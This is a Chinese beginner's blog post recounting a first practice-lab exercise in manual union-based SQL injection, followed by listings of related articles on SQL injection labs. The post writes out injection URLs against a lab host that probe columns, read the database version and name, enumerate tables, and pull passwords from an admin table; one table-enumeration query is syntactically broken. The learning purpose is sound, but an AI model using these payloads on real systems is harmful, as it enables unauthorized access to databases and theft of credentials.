菜鸟成长记 一 : 第一次靶场学习 sql injection回显手工注入。

最新推荐文章于 2024-08-14 15:33:15 发布
最新推荐文章于 2024-08-14 15:33:15 发布
阅读量718 收藏 1
点赞数
分类专栏: 菜鸟入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36135278/article/details/81712677
版权

第一次 ,第一次 ,第一次。我的故事在这之前和web安全没有一点关系。就不在这里浪费时间了。

靶场地址是http://120.203.13.75:6815/?id=1  (不重要! 往下看!  O(∩_∩)O)

标题

第一步: 在网页地址栏中,分别输入 http:// 120.203.13.75:6815/?id =1 and 1=1 (页面正常)

                                                              ***/?id =1 and 1=2                                     (页面有缺陷)

 

如图所示:出现缺陷。

在辅导员的教导下我理解如下:

?id=1 and 1=1    意味着    sql语句为   

第二步  尝试使用 order by .查找sql 里面的字段。

http:// 120.203.13.75:6815/?id =1  order by 1   ( 从 1  开始 往上加) ,会发现只有

http:// 120.203.13.75:6815/?id =1  order by 1  和   http:// 120.203.13.75:6815/?id =1  order by 2   页面无缺陷。order by 3 往上有页面缺陷!!!!

思考: order by 1  ,  2 ,3  出现缺陷的原因。 意味着   数据库有 2个字段.

第三步     我也是多次在   id后面代入整数 和其他,   select (随便整数/SQL语句), (带入整数/sql语句),理解其中的奥义的。

 

下面就简单了。因为我们找到了注入点。

 

下面就简单了

http://120.203.13.75:6815/?id= 2 union select  1,version()  查询改数据库版本

http://120.203.13.75:6815/?id= 2 union select  1,database() 查询数据库

http://120.203.13.75:6815/?id= 2 union select  1,table_name. from database_schema.tables_schema=database() 查表

120.203.13.75:6815/?id=2 union select 542, password from  admin(所查表名)

注入点为 字段2的位置。

就是此注入方式,我还是有多不懂的。不断学习中,欢迎指正。

瘦瘦的我
关注
专栏目录
26-3 SQL注入攻击 - SQL注入回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 609
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
sql注入-回显注入实例详解
CPriLuke的博客
06-26 1628
根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748 本章主要对说明的内容通过实战的方式进一步加深,实战环境 sqlilab,hackbar 1. 寻找注入点 通过注入单引号后,网站返回sql报错,确认存在SQL注入,且得知数据库的类型为MYSQL 2. 确定当前数据库的列数 通过order by进行试探得到,如下所示,当为order by 4返回数据报错 sql注入语句说明,后台的原始数据为: select *
SQL手工注入学习
09-02
喜欢学习手工注入的朋友可以看看。有的时候用工具注入得不到注入点可以用手工。一般手工比较准确。
sql注入靶场_sql注入
weixin_26705651的博客
09-21 967
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
sqli-labs漏洞靶场~SQL注入(全网最全详解)
weixin_67832625的博客
08-11 1300
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
SQL注入--靶场练习
wmr123456001的博客
02-11 2076
SQL注入靶场练习
sql注入靶场
weixin_44382333的博客
09-22 156
盲注: updatexml()函数的理解(图床的设置)
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4138
一次简单的SQL注入靶场练习
DVWA靶场SQL InjectionSQL注入
m0_51150495的博客
06-08 1465
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
SQL_Injection_Payload:SQL注入有效负载列表
01-28
8. **堆叠查询**:在单个求中执行多个查询,使得攻击者可以在一次注入中完成更复杂的操作。 9. **信息收集**:攻击者通常首先尝试获取数据库版本、用户列表、表名和列名等信息,以确定进一步的攻击策略。 10. **...
sql注入靶场实操
m0_46104808的博客
10-27 1572
sql注入漏洞利用
SQL labs靶场-SQL注入入门
2302_80280669的博客
07-22 577
sql注入为入门级的漏洞,现如今已经极为少见,但仍有其典型性。从此开始,便正式进入了黑客的大门。
SQL注入(php靶场为例)
qq_47632786的博客
02-07 475
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符型注入,若输出结果不同,则为数字型注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符型,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")。
iwebsec靶场sql注入
果粒程
02-24 1071
iwebsec靶场sql注入
SQL注入靶场攻击——sqli-labs
最新发布
qq_67812668的博客
08-14 840
概述SQL注入SQL Injection)是发生在web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库,也就是说,SQL注入就是在爱用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
搭建sql注入靶场
学无止境
05-07 4639
搭建sqli-labs SQL-LABs定义:是一个专业的sql注入练习平台, 适用于GET和POST场景, 第一步:准备工作: 1)安装php版本php5.4 选择指定版本 然后点击“安装” 第二步:下载sqli-labs 并解压 <<sqli-labs-master.zip>> 第三步:将sqli-lab文件 放到www目录下...
靶场实践之SQL注入
Stephen8848的博客
08-14 412
渗透测试的时候使用工具是很简单的,但是要是对技术有追求,还是需要了解得更深入一些,多探索!安装系统自行百度,这里不做过多说明。版本5之后,数据库里有一个默认的库。它里面有三个关键的表,分别是。
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1629
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 4628
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值